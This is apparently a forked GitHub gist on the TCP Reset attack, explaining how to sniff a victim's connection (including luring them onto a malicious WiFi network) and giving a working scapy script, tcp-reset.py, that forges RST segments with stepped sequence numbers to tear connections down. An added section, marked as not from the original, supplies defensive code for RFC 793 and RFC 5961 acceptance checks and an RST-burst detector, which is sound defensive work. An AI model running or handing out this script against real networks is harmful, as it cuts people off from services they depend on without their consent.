@Xarrow
Forked from spinpx/tcp-reset.org
Created September 17, 2018 05:53
TCP Reset attack in practice #Security #Network

TCP Reset attack

RESET (RST) is a flag in the TCP header that indicates the connection is no longer valid. If either of the two participants in a TCP connection sends a segment with the RST flag set, the connection is closed immediately.

It can therefore be used to attack TCP connections: an attacker who knows the IPs, the ports and the current sequence number of a connection can forge a TCP segment that appears to come from either party.

Given that information, the attack can be used to prevent certain users from using certain TCP-based network services.

In practice, we have to eavesdrop on the victims' communications to obtain their IPs, ports and the sequence number. This can be done by:

  • Tricking them into connecting to a malicious WiFi network, or hijacking their communications some other way.
  • Sniffing WiFi packets if they are nearby and using WiFi.

We can filter the captured TCP packets and pick the most recent packet of the connection we want to attack.

We then send a TCP segment with the RST flag set, using the source and destination IPs and ports sniffed from the victims. Note that the sequence number increases as the TCP conversation proceeds: for the RST to be honoured, its value must be equal to or larger than the ack value of the latest packet the sender received, and it must fall within the receiver's window. So the sequence number has to be updated. To make success likely, we send many segments with different sequence numbers, each larger than the sniffed ack field.

We can implement the TCP Reset attack with scapy in Python. The code is in tcp-reset.py.

Useful reference:

  • Watson, P.: Slipping in the Window: TCP Reset attacks. (2004)
tcp-reset.py

from scapy.all import IP, TCP, send, sniff

win = 512                     # window value advertised in the forged segments
tcp_rst_count = 10            # number of RST segments to send
victim_ip = "192.168.1.1"
your_iface = "mon0"           # WiFi interface in monitor mode

# get a tcp packet by sniffing WiFi
t = sniff(iface=your_iface, count=1,
          lfilter=lambda x: x.haslayer(TCP)
          and x[IP].src == victim_ip)
t = t[0]
tcpdata = {
    'src': t[IP].src,
    'dst': t[IP].dst,
    'sport': t[TCP].sport,
    'dport': t[TCP].dport,
    'seq': t[TCP].seq,
    'ack': t[TCP].ack
}
# sequence numbers to try, starting at the sniffed ack and stepping by half a window
max_seq = tcpdata['ack'] + tcp_rst_count * win
seqs = range(tcpdata['ack'], max_seq, int(win / 2))
# reply to the victim as if we were its peer: addresses and ports are swapped
p = IP(src=tcpdata['dst'], dst=tcpdata['src']) / \
    TCP(sport=tcpdata['dport'], dport=tcpdata['sport'],
        flags="R", window=win, seq=seqs[0])
for seq in seqs:
    p.seq = seq
    send(p, verbose=0, iface=your_iface)
print('tcp reset attack finish')
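As an added example that is not part of the original gist, here are the checks a defender cares about, in Python over constructed sample segments: `in_window` is the RFC 793 acceptability test a classic stack applies before honouring an RST (which is why sequence numbers stepped by half a window, as above, land), `rst_accepted_rfc5961` shows the RFC 5961 mitigation in modern stacks (only an exact RCV.NXT match resets; an in-window but inexact SEQ gets a challenge ACK), and `rst_burst_alerts` flags the burst of RSTs with stepped sequence numbers on one 4-tuple that such a script produces. All function names, thresholds and the packet tuples are assumptions made for this example.

```python
from collections import defaultdict

# Constructed sample: (timestamp, src, sport, dst, dport, flags, seq) tuples,
# standing in for what a sensor would parse from captured segments.
PACKETS = [
    (0.00, "192.168.1.1", 51000, "203.0.113.10", 443, "PA", 1000),
    (0.01, "203.0.113.10", 443, "192.168.1.1", 51000, "A", 5000),
    # burst of RSTs toward the client, sequence numbers stepped by win/2 = 256
    (0.02, "203.0.113.10", 443, "192.168.1.1", 51000, "R", 1000),
    (0.02, "203.0.113.10", 443, "192.168.1.1", 51000, "R", 1256),
    (0.02, "203.0.113.10", 443, "192.168.1.1", 51000, "R", 1512),
    (0.02, "203.0.113.10", 443, "192.168.1.1", 51000, "R", 1768),
    (0.03, "203.0.113.10", 443, "192.168.1.1", 51000, "R", 2024),
    # a single RST on an unrelated flow, as a normal teardown would look
    (0.50, "10.0.0.5", 8080, "192.168.1.1", 51002, "R", 7777),
]


def in_window(seq, rcv_nxt, rcv_wnd):
    """RFC 793 acceptability test: RST honoured if SEQ lies in [RCV.NXT, RCV.NXT+RCV.WND).
    Modulo 2**32 so the comparison survives sequence-number wrap-around."""
    return (seq - rcv_nxt) % (1 << 32) < rcv_wnd


def rst_accepted_rfc5961(seq, rcv_nxt, rcv_wnd):
    """RFC 5961 section 3.2: exact RCV.NXT match resets; in-window but inexact
    SEQ only provokes a challenge ACK (the real peer then re-sends an RST if it
    really did reset); anything else is silently dropped."""
    if seq == rcv_nxt:
        return "reset"
    if in_window(seq, rcv_nxt, rcv_wnd):
        return "challenge-ack"
    return "drop"


def rst_burst_alerts(packets, min_rsts=4, max_span=0.1):
    """Flag 4-tuples that receive >= min_rsts RSTs with distinct SEQs within
    max_span seconds. Returns [(flow, distinct_seq_count, seq_step), ...]."""
    flows = defaultdict(list)
    for ts, src, sport, dst, dport, flags, seq in packets:
        if "R" in flags:
            flows[(src, sport, dst, dport)].append((ts, seq))
    alerts = []
    for flow, rsts in flows.items():
        seqs = sorted({s for _, s in rsts})
        span = max(t for t, _ in rsts) - min(t for t, _ in rsts)
        if len(seqs) >= min_rsts and span <= max_span:
            alerts.append((flow, len(seqs), seqs[1] - seqs[0]))
    return alerts
```

A sensor could combine both views: an RST burst is suspicious on its own, and an RST whose SEQ is in-window but not exactly RCV.NXT is exactly the case RFC 5961 turns into a challenge ACK rather than a teardown.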